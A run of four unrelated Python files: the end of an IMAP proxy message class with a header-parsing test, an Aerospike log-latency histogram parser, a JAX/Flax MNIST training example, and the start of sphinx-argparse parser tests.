raw_headers raw_headers = raw_headers.replace('\r\n ','[MLSPC]').replace('\r\n\t','[MLTAB]') headers = {} lines = raw_headers.split('\r\n') for line in lines: key_end = line.find(':') key = line[:key_end].upper() value = line[key_end+1:].lstrip() #put multi-line header Cr+Lf+(SAPCE or TAB) back in headers[key] = value.replace('[MLSPC]','\r\n ').replace('[MLTAB]','\r\n\t') if ALLVERBOSE or VERBOSE: print headers return headers def getHeaders(self, negate, *names): """Retrieve a group of message headers. @type names: C{tuple} of C{str} @param names: The names of the headers to retrieve or omit. @type negate: C{bool} @param negate: If True, indicates that the headers listed in C{names} should be omitted from the return value, rather than included. @rtype: C{dict} @return: A mapping of header field names to header field values """ if ALLVERBOSE or VERBOSE: print "ImapProxyMessage['%s'].getHeaders" % self.uid print "negate = %s " % negate print names results = {} for name in names: if self.headers.has_key(name): if not negate: results[name] = self.headers[name] else: if negate: results[name] = self.headers[name] if ALLVERBOSE or VERBOSE: print results return results def getBodyFile(self): """Retrieve a file object containing only the body of this message. """ if ALLVERBOSE or VERBOSE: print "ImapProxyMessage[%s].getBodyFile" % self.uid return StringIO(self.body) def getSize(self): """Retrieve the total size, in octets, of this message. @rtype: C{int} """ if ALLVERBOSE or VERBOSE: print "ImapProxyMessage[%s].getSize()" % self.uid result = len(self.raw_headers) + len(self.body) + 4 if ALLVERBOSE or VERBOSE: print result return result def isMultipart(self): """Indicate whether this message has subparts. @rtype: C{bool} """ if ALLVERBOSE or VERBOSE: print "ImapProxyMessage[%s].isMultipart" % self.uid return self.raw_headers.__contains__("multipart") def getSubPart(self,part): """Retrieve a MIME sub-message @type part: C{int} @param part: The number of the part to retrieve, indexed from 0. @raise IndexError: Raised if the specified part does not exist. @raise TypeError: Raised if this message is not multipart. @rtype: Any object implementing C{IMessagePart}. @return: The specified sub-part. """ if ALLVERBOSE or VERBOSE: print "ImapProxyMessage[%s].getSubPart(%s)" % (self.uid, part) raise IndexError("subparts are not yet implimented") def getUID(self): """Retrieve the unique identifier associated with this message. """ if ALLVERBOSE or VERBOSE: print "ImapProxyMessage[%s].getUID" % self.uid print self.uid return self.uid def getFlags(self): """Retrieve the flags associated with this message. @rtype: C{iterable} @return: The flags, represented as strings. """ if ALLVERBOSE or VERBOSE: print "ImapProxyMessage[%s].getFlags" % self.uid print self.flags return self.flags def getInternalDate(self): """Retrieve the date internally associated with this message. @rtype: C{str} @return: An RFC822-formatted date string. """ result = self.getHeader('DATE') if ALLVERBOSE or VERBOSE: print "ImapProxyMessage[%s].getInternalDate" % self.uid print result return result def getHeader(self,key): result = self.headers[key] if ALLVERBOSE or VERBOSE: print "ImapProxyMessage[%s].getHeader(%s)" % (self.uid, key) print result return result #|############################################################################## #|Test Suite #|############################################################################## import unittest class TestImapProxyMessage(unittest.TestCase): def test_parseHeaders(self): RFC822_RAW_DATA = """FCC: imap://whysean@localhost/Sent\r\nX-Identity-Key: id1\r\nMessage-ID: <49DA2F1E.8000701@gmail.com>\r\nDate: Mon, 06 Apr 2009 12:34:38 -0400\r\nFrom: Green Span Test <green.span.test@gmail.com>\r\nX-Mozilla-Draft-Info: internal/draft; vcard=0; receipt=0; uuencode=0\r\nUser-Agent: Thunderbird 2.0.0.21 (Windows/20090302)\r\nMIME-Version: 1.0\r\nTo: whysean@gmail.com\r\nSubject: test\r\nContent-Type: text/html; charset=ISO-8859-1\r\nContent-Transfer-Encoding: 7bit""" EXPECTED_RESULTS = {'FCC':'imap://whysean@localhost/Sent', 'X-IDENTITY-KEY':'id1', 'MESSAGE-ID':'<49DA2F1E.8000701@gmail.com>', 'DATE':'Mon, 06 Apr 2009 12:34:38 -0400', 'FROM':'Green Span Test <green.span.test@gmail.com>', 'X-MOZILLA-DRAFT-INFO':'internal/draft; vcard=0; receipt=0; uuencode=0', 'USER-AGENT':'Thunderbird 2.0.0.21 (Windows/20090302)', 'MIME-VERSION':'1.0', 'TO':'whysean@gmail.com', 'SUBJECT':'test', 'CONTENT-TYPE':'text/html; charset=ISO-8859-1', 'CONTENT-TRANSFER-ENCODING':'7bit' } EXPECTED_BODY = """<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">\r\n<html>\r\n<head>\r\n</head>\r\n<body bgcolor="#ffffff" text="#000000">\r\ntest\r\n</body>\r\n</html>\r\n\r\n""" results = ImapProxyMessage._parseHeaders(None,RFC822_RAW_DATA) if ALLVERBOSE or VERBOSE: print "TestImapProxyMessage.test_parseHeaders" print results self.assertEqual(results,EXPECTED_RESULTS) #|############################################################################## #|Shell Executtion #|############################################################################## import sys if __name__=='__main__': unittest.main()
# Copyright 2013-2021 Aerospike, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # #### # =========================================================== # Imports # import datetime import re from lib.utils import constants from . import util # =========================================================== # Constants # DT_TO_MINUTE_FMT = "%b %d %Y %H:%M" DT_TIME_FMT = "%H:%M:%S" HIST_TAG_PREFIX = "histogram dump: " HIST_WITH_NS_PATTERN = "{.+}-[a-zA-Z0-9_-]+" HIST_TAG_PATTERNS = [HIST_TAG_PREFIX + "%s ", HIST_TAG_PREFIX + "{[a-zA-Z0-9_-]+}-%s "] NS_HIST_TAG_PATTERNS = [HIST_TAG_PREFIX + "{%s}-%s "] NS_SLICE_SECONDS = 5 SCAN_SIZE = 1024 * 1024 HIST_BUCKET_LINE_SUBSTRING = "hist.c:" SIZE_HIST_LIST = ["device-read-size", "device-write-size"] COUNT_HIST_LIST = ["query-rec-count"] # Unit map UNITS_MAP = {"msec": "ms", "usec": "\u03bcs"} # relative stats to input histogram # format: # histogram: ( # [in order path for stat with stat name], # [(index of value, "name of output column")] # ) relative_stat_info = {"batch-index": (["batch-sub:", "read"], [(0, "recs/sec")])} # =========================================================== class LogLatency(object): def __init__(self, reader): self.reader = reader # ------------------------------------------------ # Read a complete line from the log file. # # ------------------------------------------------ # Set bucket details. # def _set_bucket_details(self, hist): if any(ht in hist for ht in SIZE_HIST_LIST): self._bucket_labels = ( "00", "01", "02", "03", "04", "05", "06", "07", "08", "09", "10", "11", "12", "13", "14", "15", "16", "17", "18", "19", "20", "21", "22", "23", "24", "25", ) self._all_buckets = len(self._bucket_labels) self._bucket_unit = "bytes" elif any(ht in hist for ht in COUNT_HIST_LIST): self._bucket_labels = ( "00", "01", "02", "03", "04", "05", "06", "07", "08", "09", "10", "11", "12", "13", "14", "15", "16", "17", "18", "19", "20", "21", "22", "23", "24", "25", ) self._all_buckets = len(self._bucket_labels) self._bucket_unit = "records" else: self._bucket_labels = ( "00", "01", "02", "03", "04", "05", "06", "07", "08", "09", "10", "11", "12", "13", "14", "15", "16", ) self._all_buckets = len(self._bucket_labels) # histogram bucket units are set on a per line basis def _read_line(self, file_itr): line = "" try: tm, line = next(file_itr) if not line: return None return line except Exception: return None # ------------------------------------------------ # Parse a histogram total from a log line. # def _parse_total_ops(self, line): return int(line[line.rfind("(") + 1 : line.rfind(" total)")]) # ------------------------------------------------ # Get one set of bucket values. # def _read_bucket_values(self, line, file_itr): values = {} for b in range(self._all_buckets): values[b] = 0 total = self._parse_total_ops(line) line = self._read_line(file_itr) if not line: return 0, 0, 0 b_min = 0 b_total = 0 while True: found = 0 if HIST_BUCKET_LINE_SUBSTRING in line: for b in range(b_min, self._all_buckets): pattern = r".*?\(" + self._bucket_labels[b] + r": (.*?)\).*?" r = re.compile(pattern) if r.search(line): found = found + 1 values[b] = int(r.search(line).group(1)) b_total = b_total + values[b] if found == 0: break line = self._read_line(file_itr) if not line: if b_total < total: # Incomplete bucket details return 0, 0, 0 else: line = 0 break if b_total >= total: break b_min = b_min + found return total, values, line # ------------------------------------------------ # Subtract one set of bucket values from another. # def _subtract_buckets(self, new_values, old_values): slice_values = {} for b in range(self._all_buckets): if new_values[b] < old_values[b]: new_values[b] = old_values[b] slice_values[b] = new_values[b] - old_values[b] return slice_values # ------------------------------------------------ # Add one set of bucket values to another. # def _add_buckets(self, b1_values, b2_values): slice_values = {} for b in range(self._all_buckets): slice_values[b] = b1_values[b] + b2_values[b] return slice_values # ------------------------------------------------ # Get the percentage of operations within every bucket. # def _bucket_percentages(self, total, values): percentages = [0.0] * self._all_buckets if total > 0: for b in range(self._all_buckets): percentages[b] = (float(values[b]) / total) * 100 return percentages # ------------------------------------------------ # Get the percentage of operations in all buckets > bucket. # def _percentage_over(self, bucket, percentages): percentage = 0.0 for b in range(self._all_buckets): if b > bucket: percentage = percentage + percentages[b] return percentage def ceil_time(self, dt): seconds = 10 - (dt.second % 10) if seconds == 10: return dt return dt + datetime.timedelta(0, seconds, -dt.microsecond) # ------------------------------------------------- # Get a stat value from line. # def _read_stat(self, line, stat=[]): values = [] if not stat: return values latency_pattern1 = r"%s (\d+)" latency_pattern2 = r"%s \(([0-9,\s]+)\)" latency_pattern3 = r"(\d+)\((\d+)\) %s" latency_pattern4 = r"%s \((\d+)" grep_str = stat[-1] m = re.search(latency_pattern1 % (grep_str), line) if m: values.append(int(m.group(1))) return values m = re.search(latency_pattern2 % (grep_str), line) if m: values = [int(x) for x in m.group(1).split(",")] return values m = re.search(latency_pattern3 % (grep_str), line) if m: values = [int(x) for x in list(m.groups())] m = re.search(latency_pattern4 % (grep_str), line) if m: values.append(int(m.group(1))) return values return values # ------------------------------------------------ # Add one list of stat values to another. # def _add_stat_values(self, v1, v2): if not v1: return v2 if not v2: return v1 l1 = len(v1) l2 = len(v2) values = [] for i in range(max(l1, l2)): val = 0 if i < l1: val += v1[i] if i < l2: val += v2[i] values.append(val) return values # ------------------------------------------------ # Subtract one list of stat values from another. # def _subtract_stat_values(self, new_values, old_values): values = [] newl = len(new_values) oldl = len(old_values) for i in range(max(newl, oldl)): if i < newl: # next item from new_values newval = new_values[i] if i < oldl: # item available for same index in old_values values.append(newval - old_values[i]) else: # item not available for same index in old_values values.append(newval) else: # item not available in new_values # add 0 values.append(0) return values # ------------------------------------------------ # Find max from two lists of stat values. # def _get_max_stat_values(self, new_values, old_values): values = [] newl = len(new_values) oldl = len(old_values) for i in range(max(newl, oldl)): if i >= newl: # no item in new_values values.append(old_values[i]) elif i >= oldl: # no item in old_values values.append(new_values[i]) else: # items available for index i in both list values.append(max(old_values[i], new_values[i])) return values # ------------------------------------------------ # Get a histogram at or just after the specified datetime. # def _read_hist( self, hist_tags, after_dt, file_itr, line=0, end_dt=None, before_dt=None, read_all_dumps=False, relative_stat_path=[], ): if not line: # read next line line = self._read_line(file_itr) total = 0 values = 0 stat_values = [] dt = "" unit = "msec" while True: if not line: return total, values, 0, 0, stat_values, unit dt = self.reader.parse_dt(line) if dt < after_dt: # ignore lines with timestamp before before_dt line = self._read_line(file_itr) continue if end_dt and dt > end_dt: # found line with timestamp after end_dt return total, values, dt, line, stat_values, unit if before_dt and dt > before_dt: # found line with timestamp after before_dt return total, values, dt, line, stat_values, unit if relative_stat_path and util.contains_substrings_in_order( line, relative_stat_path ): temp_sval = self._read_stat(line, relative_stat_path) stat_values = self._add_stat_values(stat_values, temp_sval) elif any(re.search(ht, line) for ht in hist_tags): break line = self._read_line(file_itr) if "usec" in line: unit = "usec" elif "msec" in line: unit = "msec" total, values, line = self._read_bucket_values(line, file_itr) if not line: return 0, 0, 0, 0, stat_values, unit if read_all_dumps or relative_stat_path: if not before_dt: before_dt = dt + datetime.timedelta(seconds=NS_SLICE_SECONDS) r_total, r_values, r_dt, line, r_stat_values, _ = self._read_hist( hist_tags, after_dt, file_itr, line, end_dt, before_dt, read_all_dumps=read_all_dumps, relative_stat_path=relative_stat_path, ) total += r_total if r_values: values = self._add_buckets(values, r_values) if r_stat_values: stat_values = self._add_stat_values(stat_values, r_stat_values) return total, values, dt, line, stat_values, unit # ------------------------------------------------ # Get a timedelta in seconds. # def _elapsed_seconds(self, td): return td.seconds + (td.days * 24 * 3600) # ------------------------------------------------ # Generate padding. # def _repeat(self, what, n): pad = "" for i in range(n): pad = pad + what return pad def compute_latency( self, arg_log_itr, arg_hist, arg_slice, arg_from, arg_end_date, arg_num_buckets, arg_every_nth, arg_rounding_time=True, arg_ns=None, arg_relative_stats=False, ): latency = {} tps_key = ("ops/sec", None) latency[tps_key] = {} # Sanity-check some arguments: if ( arg_hist is None or arg_num_buckets < 1 or arg_every_nth < 1 or not arg_slice ): yield None, None else: # Set buckets self._set_bucket_details(arg_hist) slice_timedelta = arg_slice max_bucket = 0 # sometimes slice timestamps are not perfect, there might be some delta if slice_timedelta > self.reader.parse_timedelta("1"): slice_timedelta -= self.reader.parse_timedelta("1") # Find index + 1 of last bucket to display: for b in range(self._all_buckets): if b % arg_every_nth == 0: max_bucket = b + 1 if arg_num_buckets == 1: break else: arg_num_buckets = arg_num_buckets - 1 file_itr = arg_log_itr # By default reading one bucket dump for 10 second slice, # In case of multiple namespaces, it will read all bucket dumps for all namepspaces for same slice read_all_dumps = False # Set histogram tag: if arg_ns: # Analysing latency for histogram arg_hist for specific namespace arg_ns # It needs to read single bucket dump for a slice hist_tags = [s % (arg_ns, arg_hist) for s in NS_HIST_TAG_PATTERNS] elif re.match(HIST_WITH_NS_PATTERN, arg_hist): # Analysing latency for specific histogram for specific namespace ({namespace}-histogram) # It needs to read single bucket dump for a slice hist_tags = [HIST_TAG_PREFIX + "%s " % (arg_hist)] else: # Analysing latency for histogram arg_hist # It needs to read all bucket dumps for a slice hist_tags = [s % (arg_hist) for s in HIST_TAG_PATTERNS] read_all_dumps = True init_dt = arg_from relative_stat_path = [] relative_stat_index = [] if arg_relative_stats and arg_hist in relative_stat_info: info = relative_stat_info[arg_hist] relative_stat_path = info[0] relative_stat_index = info[1] for idx_name in relative_stat_index: latency[(idx_name[1], None)] = {} # Find first histogram: old_total, old_values, old_dt, line, old_stat_values, _ = self._read_hist( hist_tags, init_dt, file_itr, end_dt=arg_end_date, read_all_dumps=read_all_dumps, relative_stat_path=relative_stat_path, ) if line: end_dt = arg_end_date labels = [] # Other initialization before processing time slices: which_slice = 0 after_dt = old_dt + slice_timedelta overs, avg_overs, max_overs = ( [0.0] * max_bucket, [0.0] * max_bucket, [0.0] * max_bucket, ) total_ops, total_seconds = 0, 0 max_rate = 0.0 total_stat_values = [0.0] * len(old_stat_values) max_stat_values = [0.0] * len(old_stat_values) # Process all the time slices: while end_dt > old_dt: ( new_total, new_values, new_dt, line, new_stat_values, new_unit, ) = self._read_hist( hist_tags, after_dt, file_itr, line, end_dt=arg_end_date, read_all_dumps=read_all_dumps, relative_stat_path=relative_stat_path, ) self._bucket_unit = UNITS_MAP[new_unit] if not new_values: # This can happen in either eof or end of input time # range break # Get the "deltas" for this slice: slice_total = new_total - old_total slice_values = self._subtract_buckets(new_values, old_values) slice_seconds_actual = self._elapsed_seconds(new_dt - old_dt) slice_stat_values = [] slice_stat_rates = [] if relative_stat_path: slice_stat_values = self._subtract_stat_values( new_stat_values, old_stat_values ) slice_stat_rates = [ round(float(v) / slice_seconds_actual, 1) for v in slice_stat_values ] # Get the rate for this slice: rate = round(float(slice_total) / slice_seconds_actual, 1) total_ops = total_ops + slice_total total_seconds = total_seconds + slice_seconds_actual if rate > max_rate: max_rate = rate if relative_stat_path: total_stat_values = self._add_stat_values( total_stat_values, slice_stat_values ) max_stat_values = self._get_max_stat_values( max_stat_values, slice_stat_rates ) # Convert bucket values for this slice to percentages: percentages = self._bucket_percentages(slice_total, slice_values) # For each (displayed) threshold, accumulate percentages # over threshold: for i in range(max_bucket): if i % arg_every_nth: continue overs[i] = round(self._percentage_over(i, percentages), 2) avg_overs[i] = avg_overs[i] + overs[i] if overs[i] > max_overs[i]: max_overs[i] = overs[i] key_dt = new_dt if arg_rounding_time: key_dt = self.ceil_time(key_dt) for i in range(max_bucket): labels.append(0) if i % arg_every_nth == 0: labels[i] = (2 ** i, self._bucket_unit) latency[(2 ** i, self._bucket_unit)] = {} for i in range(max_bucket): if i % arg_every_nth: continue latency[labels[i]][ key_dt.strftime(constants.DT_FMT) ] = "%.2f" % (overs[i]) latency[tps_key][key_dt.strftime(constants.DT_FMT)] = "%.1f" % ( rate ) if relative_stat_index: for idx_name in relative_stat_index: if idx_name[0] < len(slice_stat_rates): latency[(idx_name[1], None)][ key_dt.strftime(constants.DT_FMT) ] = "%.1f" % (slice_stat_rates[idx_name[0]]) else: latency[(idx_name[1], None)][ key_dt.strftime(constants.DT_FMT) ] = "-" yield key_dt, latency # Prepare for next slice: for key in latency: latency[key] = {} which_slice = which_slice + 1 after_dt = new_dt + slice_timedelta old_total, old_values, old_dt = new_total, new_values, new_dt old_stat_values = new_stat_values # Compute averages and maximums: if which_slice > 0: for i in range(max_bucket): if i % arg_every_nth == 0: avg_overs[i] = avg_overs[i] / which_slice avg_rate = total_ops / total_seconds avg_stat_values = [] if relative_stat_path: avg_stat_values = [v / total_seconds for v in total_stat_values] for i in range(max_bucket): if i % arg_every_nth: continue latency[labels[i]]["avg"] = "%.2f" % (avg_overs[i]) latency[labels[i]]["max"] = "%.2f" % (max_overs[i]) latency[tps_key]["avg"] = "%.1f" % (avg_rate) latency[tps_key]["max"] = "%.1f" % (max_rate) if relative_stat_index: for idx_name in relative_stat_index: if idx_name[0] < len(avg_stat_values): latency[(idx_name[1], None)]["avg"] = "%.1f" % ( avg_stat_values[idx_name[0]] ) if idx_name[0] < len(max_stat_values): latency[(idx_name[1], None)]["max"] = "%.1f" % ( max_stat_values[idx_name[0]] ) yield constants.END_ROW_KEY, latency
# Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Definitions of two versions of MNIST (model and training code ). One definition uses pure JAX (for those who prefer an example with fewer moving parts, at the expense of code size), and another using Flax. See README.md for how these are used. """ import functools import logging import re import time from typing import Any, Callable, Optional, Sequence, Tuple from absl import flags import flax # type: ignore[import] from flax import linen as nn import jax import jax.numpy as jnp from matplotlib import pyplot as plt # type: ignore import numpy as np import tensorflow as tf # type: ignore import tensorflow_datasets as tfds # type: ignore flags.DEFINE_boolean("mock_data", False, "Use fake data, for testing.") FLAGS = flags.FLAGS #### Model parameters # For fun, let's use different batch sizes for training and for evaluation. train_batch_size = 128 test_batch_size = 16 # Define common parameters for both the JAX and the Flax models. input_shape = (28, 28, 1) # Excluding batch_size layer_sizes = [784, 512, 512, 10] # 10 is the number of classes param_scale = 0.1 step_size = 0.001 def load_mnist(split: tfds.Split, batch_size: int): """Loads either training or test MNIST data. Args: split: either tfds.Split.TRAIN or tfds.Split.TEST. Returns: an iterator with pairs (images, labels). The images have shape (B, 28, 28, 1) and the labels have shape (B, 10), where B is the batch_size. """ if FLAGS.mock_data: with tfds.testing.mock_data(num_examples=batch_size): try: ds = tfds.load("mnist", split=split) except Exception as e: m = re.search(r'metadata files were not found in (.+/)mnist/', str(e)) if m: msg = ("TFDS mock_data is missing the mnist metadata files. Run the " "`saved_model_main.py` binary and see where TFDS downloads " "the mnist data set (typically ~/tensorflow_datasets/mnist). " f"Copy the `mnist` directory to {m.group(1)} and re-run the test") raise ValueError(msg) from e else: raise e else: ds = tfds.load("mnist", split=split) def _prepare_example(x): image = tf.cast(x["image"], tf.float32) / 255.0 label = tf.one_hot(x["label"], 10) return (image, label) ds = ds.map(_prepare_example) # drop_remainder=True is important for use with Keras ds = ds.cache().shuffle(1000).batch(batch_size, drop_remainder=True) return ds class PureJaxMNIST: """An MNIST model written using pure JAX. There is an option for the model to skip the classifier layer, for demonstrating reuse of the classifier-less model into a larger model. See README.md. """ name = "mnist_pure_jax" @staticmethod def predict(params: Sequence[Tuple[Any, Any]], inputs, with_classifier=True): """The prediction function. Args: params: a list with pairs of weights and biases for each layer. inputs: the batch of images (B, 28, 28, 1) with_classifier: whether to include the classifier layer. Returns: either the predictions (B, 10) if with_classifier=True, or the final set of logits of shape (B, 512). """ x = inputs.reshape((inputs.shape[0], -1)) # flatten to f32[B, 784] for w, b in params[:-1]: x = jnp.dot(x, w) + b x = jnp.tanh(x) if not with_classifier: return x final_w, final_b = params[-1] logits = jnp.dot(x, final_w) + final_b return logits - jax.scipy.special.logsumexp( logits, axis=1, keepdims=True) # type: ignore[attr-defined] @staticmethod def loss(params, inputs, labels): predictions = PureJaxMNIST.predict(params, inputs, with_classifier=True) return -jnp.mean(jnp.sum(predictions * labels, axis=1)) @staticmethod def accuracy(predict: Callable, params, dataset): @jax.jit def _per_batch(inputs, labels): target_class = jnp.argmax(labels, axis=1) predicted_class = jnp.argmax(predict(params, inputs), axis=1) return jnp.mean(predicted_class == target_class) batched = [ _per_batch(inputs, labels) for inputs, labels in tfds.as_numpy(dataset) ] return jnp.mean(jnp.stack(batched)) @staticmethod def update(params, inputs, labels): grads = jax.grad(PureJaxMNIST.loss)(params, inputs, labels) return [(w - step_size * dw, b - step_size * db) for (w, b), (dw, db) in zip(params, grads)] @staticmethod def train(train_ds, test_ds, num_epochs, with_classifier=True): """Trains a pure JAX MNIST predictor. Returns: a tuple with two elements: - a predictor function with signature "(Params, ImagesBatch) -> Predictions". If `with_classifier=False` then the output of the predictor function is the last layer of logits. - the parameters "Params" for the predictor function """ rng = jax.random.PRNGKey(0) params = [(param_scale * jax.random.normal(rng, (m, n)), param_scale * jax.random.normal(rng, (n,))) for m, n, in zip(layer_sizes[:-1], layer_sizes[1:])] for epoch in range(num_epochs): start_time = time.time() for inputs, labels in tfds.as_numpy(train_ds): params = jax.jit(PureJaxMNIST.update)(params, inputs, labels) epoch_time = time.time() - start_time train_acc = PureJaxMNIST.accuracy(PureJaxMNIST.predict, params, train_ds) test_acc = PureJaxMNIST.accuracy(PureJaxMNIST.predict, params, test_ds) logging.info("%s: Epoch %d in %0.2f sec", PureJaxMNIST.name, epoch, epoch_time) logging.info("%s: Training set accuracy %0.2f%%", PureJaxMNIST.name, 100. * train_acc) logging.info("%s: Test set accuracy %0.2f%%", PureJaxMNIST.name, 100. * test_acc) return (functools.partial( PureJaxMNIST.predict, with_classifier=with_classifier), params) class FlaxMNIST: """An MNIST model using Flax.""" name = "mnist_flax" class Module(nn.Module): """A simple CNN model for MNIST. There is an option for the model to skip the classifier layer, for demonstrating reuse of the classifier-less model into a larger model. See README.md. """ @nn.compact def __call__(self, x, with_classifier=True): x = nn.Conv(features=32, kernel_size=(3, 3))(x) x = nn.relu(x) x = nn.avg_pool(x, window_shape=(2, 2), strides=(2, 2)) x = nn.Conv(features=64, kernel_size=(3, 3))(x) x = nn.relu(x) x = nn.avg_pool(x, window_shape=(2, 2), strides=(2, 2)) x = x.reshape((x.shape[0], -1)) # flatten x = nn.Dense(features=256)(x) x = nn.relu(x) if not with_classifier: return x x = nn.Dense(features=10)(x) x = nn.log_softmax(x) return x # Create the model and save it model = Module() @staticmethod def predict(params, inputs, with_classifier=True): return FlaxMNIST.model.apply({"params": params}, inputs, with_classifier=with_classifier) @staticmethod def loss(params, inputs, labels): # Same as the pure JAX example # Must use the classifier layer because the labels are classes predictions = FlaxMNIST.predict(params, inputs, with_classifier=True) return -jnp.mean(jnp.sum(predictions * labels, axis=1)) @staticmethod def update(optimizer, inputs, labels): grad = jax.grad(FlaxMNIST.loss)(optimizer.target, inputs, labels) optimizer = optimizer.apply_gradient(grad) return optimizer @staticmethod def train(train_ds, test_ds, num_epochs, with_classifier=True): """Trains a pure JAX MNIST predictor. Returns: a tuple with two elements: - a predictor function with signature "(Params, ImagesBatch) -> Predictions". If `with_classifier=False` then the output of the predictor function is the last layer of logits. - the parameters "Params" for the predictor function """ rng = jax.random.PRNGKey(0) momentum_mass = 0.9 init_shape = jnp.ones((1,) + input_shape, jnp.float32) initial_params = FlaxMNIST.model.init(rng, init_shape)["params"] optimizer_def = flax.optim.Momentum( learning_rate=step_size, beta=momentum_mass) optimizer = optimizer_def.create(initial_params) for epoch in range(num_epochs): start_time = time.time() for inputs, labels in tfds.as_numpy(train_ds): optimizer = jax.jit(FlaxMNIST.update)(optimizer, inputs, labels) epoch_time = time.time() - start_time # Same accuracy function as for the pure JAX example train_acc = PureJaxMNIST.accuracy(FlaxMNIST.predict, optimizer.target, train_ds) test_acc = PureJaxMNIST.accuracy(FlaxMNIST.predict, optimizer.target, test_ds) logging.info("%s: Epoch %d in %0.2f sec", FlaxMNIST.name, epoch, epoch_time) logging.info("%s: Training set accuracy %0.2f%%", FlaxMNIST.name, 100. * train_acc) logging.info("%s: Test set accuracy %0.2f%%", FlaxMNIST.name, 100. * test_acc) # See discussion in README.md for packaging Flax models for conversion predict_fn = functools.partial(FlaxMNIST.predict, with_classifier=with_classifier) params = optimizer.target return (predict_fn, params) def plot_images(ds, nr_rows: int, nr_cols: int, title: str, inference_fn: Optional[Callable] = None): """Plots a grid of images with their predictions. Params: ds: a tensorflow dataset from where to pick the images and labels. nr_rows, nr_cols: the size of the grid to plot title: the title of the plot inference_fn: if None then print the existing label, else use this function on the batch of images to produce a batch of inference results, which get printed. inference_batch_size: the size of the batch of images passed to `inference_fn`. """ count = nr_rows * nr_cols fig = plt.figure(figsize=(8., 4.), num=title) # Get the first batch (images, labels), = list(tfds.as_numpy(ds.take(1))) if inference_fn: inferred_labels = inference_fn(images) for i, image in enumerate(images[:count]): digit = fig.add_subplot(nr_rows, nr_cols, i + 1) if inference_fn: digit_title = f"infer: {np.argmax(inferred_labels[i])}\n" else: digit_title = "" digit_title += f"label: {np.argmax(labels[i])}" digit.set_title(digit_title) plt.imshow( (np.reshape(image, (28, 28)) * 255).astype(np.uint8), interpolation="nearest") plt.show()
import argparse from sphinxarg.parser import parse_parser, parser_navigate import six def test_parse_options(): parser = argparse.ArgumentParser() parser.add_argument('--foo', action='store_true', default=False, help='foo help') parser.add_argument('--bar', action='store_true', default=False) data = parse_parser(parser) assert data['action_groups'][0]['options'] == [ { 'name': ['--foo'], 'default': False, 'help': 'foo help' }, { 'name': ['--bar'], 'default': False, 'help': '' } ] def test_parse_default(): parser = argparse.ArgumentParser() parser.add_argument('--foo', default='123') data = parse_parser(parser) assert data['action_groups'][0]['options'] == [ { 'name': ['--foo'], 'default': '"123"', 'help': '' } ] def test_parse_arg_choices(): parser = argparse.ArgumentParser() parser.add_argument('move', choices=['rock', 'paper', 'scissors']) data = parse_parser(parser) assert data['action_groups'][0]['options'] == [ { 'name': ['move'], 'help': '', 'choices': ['rock', 'paper', 'scissors'], 'default': None } ] def test_parse_opt_choices(): parser = argparse.ArgumentParser() parser.add_argument('--move', choices=['rock', 'paper', 'scissors']) data = parse_parser(parser) assert data['action_groups'][0]['options'] == [ { 'name': ['--move'], 'default': None, 'help': '', 'choices': ['rock', 'paper', 'scissors'] } ] def test_parse_default_skip_default(): parser = argparse.ArgumentParser() parser.add_argument('--foo', default='123') data = parse_parser(parser, skip_default_values=True) assert data['action_groups'][0]['options'] == [ { 'name': ['--foo'], 'default': '==SUPPRESS==', 'help': '' } ] def test_parse_positional(): parser = argparse.ArgumentParser() parser.add_argument('foo', default=False, help='foo help') parser.add_argument('bar', default=False) data = parse_parser(parser) assert data['action_groups'][0]['options'] == [ { 'name': ['foo'], 'help': 'foo help', 'default': False }, { 'name': ['bar'], 'help': '', 'default': False } ] def test_parse_description(): parser = argparse.ArgumentParser(description='described', epilog='epilogged') parser.add_argument('foo', default=False, help='foo help') parser.add_argument('bar', default=False) data = parse_parser(parser) assert data['description'] == 'described' assert data['epilog'] == 'epilogged' assert data['action_groups'][0]['options'] == [ { 'name': ['foo'], 'help': 'foo help', 'default': False }, { 'name': ['bar'], 'help': '', 'default': False } ] def test_parse_nested(): parser = argparse.ArgumentParser() parser.add_argument('foo', default=False, help='foo help') parser.add_argument('bar', default=False) subparsers = parser.add_subparsers() subparser = subparsers.add_parser('install', help='install help') subparser.add_argument('ref', type=str, help='foo1 help') subparser.add_argument('--upgrade', action='store_true', default=False, help='foo2 help') data = parse_parser(parser) assert data['action_groups'][0]['options'] == [ { 'name': ['foo'], 'help': 'foo help', 'default': False }, { 'name': ['bar'], 'help': '', 'default': False } ] assert data['children'] == [ { 'name': 'install', 'help': 'install help', 'usage': 'usage: py.test install [-h] [--upgrade] ref', 'bare_usage': 'py.test install [-h] [--upgrade] ref', 'action_groups': [ { 'title': 'Positional Arguments', 'description': None, 'options': [ { 'name': ['ref'], 'help': 'foo1 help', 'default': None } ] }, { 'description': None, 'title': 'Named Arguments', 'options': [ { 'name': ['--upgrade'], 'default': False, 'help': 'foo2 help' } ] } ] } ] if six.PY3: def test_parse_nested_with_alias(): parser = argparse.ArgumentParser() parser.add_argument('foo', default=False, help='foo help') parser.add_argument('bar', default=False) subparsers = parser.add_subparsers() subparser = subparsers.add_parser('install', aliases=['i'], help='install help') subparser.add_argument('ref', type=str, help='foo1 help') subparser.add_argument('--upgrade', action='store_true', default=False, help='foo2 help') data = parse_parser(parser) assert data['action_groups'][0]['options'] == [ { 'name': ['foo'], 'help': 'foo help', 'default': False }, { 'name': ['bar'], 'help': '', 'default': False } ] assert data['children'] == [ { 'name': 'install (i)', 'identifier': 'install', 'help': 'install help', 'usage': 'usage: py.test install [-h] [--upgrade] ref', 'bare_usage': 'py.test install [-h] [--upgrade] ref', 'action_groups': [ { 'title': 'Positional Arguments', 'description': None, 'options': [ { 'name': ['ref'], 'help': 'foo1 help', 'default': None } ] }, { 'description': None, 'title': 'Named Arguments', 'options': [ { 